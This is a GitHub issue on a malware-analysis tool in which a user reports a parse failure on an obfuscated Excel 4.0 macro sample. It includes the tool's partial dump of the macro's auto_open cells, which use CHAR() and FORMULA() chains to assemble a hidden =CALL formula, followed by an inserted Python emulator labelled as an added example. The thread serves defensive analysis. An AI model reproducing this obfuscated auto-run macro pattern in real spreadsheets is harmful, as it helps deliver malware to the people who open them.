DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
570 stars 115 forks

Unexpected token Token('__ANON_0' #101

Closed seanthegeek closed 2 years ago

seanthegeek commented 2 years ago

Deobfuscating the following malicious macro fails

auto_open: auto_open->GERGEGSFWG!$F$1
SHEET: GERGEGSFWG, macrosheet
CELL:F9, =FORMULA(Vuk1!C17, Vuk2!C14)=FORMULA(Vuk2!G8, Vuk3!D13)=FORMULA(Vuk3!I5, Vuk4!G7)=FORMULA(Vuk4!B13, Vuk5!E2)=FORMULA(Vuk5!D19, Vuk6!B13)=FORMULA(Vuk6!I4, Vuk7!F8)=FORMULA(Vuk7!B14, Vuk1!F2)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!D6&Vuk7!F8&Sssssbvr1!B15&Vuk7!F8&Sssssbvr1!F11&Vuk7!F8&Sssssbvr1!H3&Vuk7!F8&Sssssbvr1!J8&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30), False
SHEET: Vuk1, macrosheet
CELL:C17, =CHAR(CCwdbuk1!C54), =
SHEET: Vuk2, macrosheet
CELL:G8, =CHAR(CCwdbuk1!E49), A
SHEET: Vuk3, macrosheet
CELL:I5, =CHAR(CCwdbuk1!H48), L
SHEET: Vuk4, macrosheet
CELL:B13, =CHAR(CCwdbuk1!L52), e
SHEET: Vuk5, macrosheet
CELL:D19, =CHAR(CCwdbuk1!P50), C
SHEET: Vuk6, macrosheet
CELL:I4, =CHAR(CCwdbuk1!Q55), r
SHEET: Vuk7, macrosheet
CELL:B14, =CHAR(CCwdbuk1!B48), o
auto_open: auto_open->GERGEGSFWG!$F$1
[Starting Deobfuscation]
Error [deobfuscator.py:2580 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', 'CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30)') at line 1, column 350.
Expected one of: 
        * QUOTE
        * EXCLAMATION
        * NUMBER
        * LBRACE
        * L_PRA
        * ERROR
        * BOOLEAN
        * ROW
        * /\$?([a-qs-z][a-z]?)\$?\d+\b|\$?(r[a-bd-z]?)\$?\d+\b(?!C)/i
        * NAME
        * STRING
Previous tokens: [Token('CONCATOP', '&')]

Files:

[END of Deobfuscation]
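The dump above shows the usual XLM build-up: numbers on a helper sheet (CCwdbuk1) are turned into single characters with CHAR(), FORMULA() copies each character into a scratch cell on one of the Vuk sheets, and a later FORMULA() concatenates those scratch cells with & into a new formula that it writes into F15. The following is an added example, not part of this issue and not XLMMacroDeobfuscator's own code: a minimal emulator for exactly that subset (CHAR, &, FORMULA, cell references) that replays the chain and records every FORMULA() write, which is the text a defender wants to read. The workbook is constructed from the cell dump; the numeric contents of CCwdbuk1 are an assumption (the ASCII codes that reproduce the characters the dump shows), and laying the FORMULA() steps out one per row from the auto_open cell is also an assumption.

```python
import re

# Constructed workbook modelled on the cell dump in the issue. The numbers on
# CCwdbuk1 are assumed ASCII codes chosen so CHAR() yields the characters the
# dump shows ("=", "A", "L", "e", "C", "r", "o"). The FORMULA() steps are laid
# out one per row in column F of the auto_open sheet (an assumption as well).
SHEETS = {
    "CCwdbuk1": {"C54": 61, "E49": 65, "H48": 76, "L52": 101,
                 "P50": 67, "Q55": 114, "B48": 111},
    "Vuk1": {"C17": "=CHAR(CCwdbuk1!C54)"},
    "Vuk2": {"G8": "=CHAR(CCwdbuk1!E49)"},
    "Vuk3": {"I5": "=CHAR(CCwdbuk1!H48)"},
    "Vuk4": {"B13": "=CHAR(CCwdbuk1!L52)"},
    "Vuk5": {"D19": "=CHAR(CCwdbuk1!P50)"},
    "Vuk6": {"I4": "=CHAR(CCwdbuk1!Q55)"},
    "Vuk7": {"B14": "=CHAR(CCwdbuk1!B48)"},
    "GERGEGSFWG": {
        "F1": "=FORMULA(Vuk1!C17, Vuk2!C14)",
        "F2": "=FORMULA(Vuk2!G8, Vuk3!D13)",
        "F3": "=FORMULA(Vuk3!I5, Vuk4!G7)",
        "F4": "=FORMULA(Vuk4!B13, Vuk5!E2)",
        "F5": "=FORMULA(Vuk5!D19, Vuk6!B13)",
        "F6": "=FORMULA(Vuk6!I4, Vuk7!F8)",
        "F7": "=FORMULA(Vuk7!B14, Vuk1!F2)",
        "F8": "=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7, F15)",
    },
}

# Optional sheet prefix, optional $ anchors, 1-3 column letters, a row number.
REF = re.compile(r"^(?:(?P<sheet>\w+)!)?\$?(?P<col>[A-Za-z]{1,3})\$?(?P<row>\d+)$")


def split_top_level(text, sep):
    """Split on `sep` only outside parentheses and string literals."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


class Emulator:
    def __init__(self, sheets):
        self.sheets = {name: dict(cells) for name, cells in sheets.items()}
        self.written = {}   # (sheet, cell) -> text deposited by FORMULA()
        self.emitted = []   # every FORMULA() write, in execution order

    def resolve(self, cur_sheet, ref):
        m = REF.match(ref.strip())
        if not m:
            raise ValueError(f"not a cell reference: {ref!r}")
        return (m.group("sheet") or cur_sheet), m.group("col").upper() + m.group("row")

    def value(self, sheet, cell):
        # Text written by FORMULA() shadows whatever the sheet held originally.
        if (sheet, cell) in self.written:
            return self.written[(sheet, cell)]
        raw = self.sheets.get(sheet, {}).get(cell, "")
        if isinstance(raw, str) and raw.startswith("="):
            return self.evaluate(sheet, raw[1:])
        return raw

    def evaluate(self, sheet, expr):
        expr = expr.strip()
        parts = split_top_level(expr, "&")
        if len(parts) > 1:                       # concatenation
            return "".join(str(self.evaluate(sheet, p)) for p in parts)
        if len(expr) >= 2 and expr[0] == '"' and expr[-1] == '"':
            return expr[1:-1]                    # string literal
        if re.fullmatch(r"-?\d+", expr):
            return int(expr)                     # numeric literal
        call = re.fullmatch(r"(\w+)\((.*)\)", expr, re.S)
        if call:
            name, args = call.group(1).upper(), split_top_level(call.group(2), ",")
            if name == "CHAR":
                return chr(int(self.evaluate(sheet, args[0])))
            if name == "FORMULA":                # FORMULA(text, target_cell)
                text = str(self.evaluate(sheet, args[0]))
                target = self.resolve(sheet, args[1])
                self.written[target] = text
                self.emitted.append((f"{target[0]}!{target[1]}", text))
                return text
            raise ValueError(f"unsupported function: {name}")
        return self.value(*self.resolve(sheet, expr))   # plain cell reference

    def run_auto_open(self, sheet, start_cell, max_steps=100):
        """Walk down the column from the auto_open cell, evaluating each formula
        until an empty cell is hit (standing in for HALT/RETURN)."""
        col, row = re.match(r"([A-Za-z]+)(\d+)", start_cell).groups()
        row = int(row)
        for _ in range(max_steps):
            raw = self.sheets.get(sheet, {}).get(f"{col}{row}")
            if raw is None:
                break
            if isinstance(raw, str) and raw.startswith("="):
                self.evaluate(sheet, raw[1:])
            row += 1
        return self.emitted


def deobfuscate(sheets=SHEETS, auto_open=("GERGEGSFWG", "F1")):
    """Return the list of (target_cell, text) pairs FORMULA() wrote, in order."""
    return Emulator(sheets).run_auto_open(*auto_open)


if __name__ == "__main__":
    for target, text in deobfuscate():
        print(f"{target:<16} <- {text!r}")
```

Running it lists the seven single-character writes followed by the write into F15, whose text begins with `=CALL`; that is where the readable payload starts. The remaining operands of that concatenation (the Sssssbvr1, Sssssbvr2 and CCwdbuk1 cells) are not in the dump, so the example stops at that prefix rather than guessing them.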
DissectMalware commented 2 years ago

Please share the sample or if it is on VT, its hash so I can test it. You can reach me directly via DM on Twitter, if you do not want to share the info here.

seanthegeek commented 2 years ago

https://www.virustotal.com/gui/file/714469E1B0F10CE91DD8104A064A85586E29803B780C4F6AF829745B9BBD38B1

DissectMalware commented 2 years ago

The issue is fixed in v2.3.4.
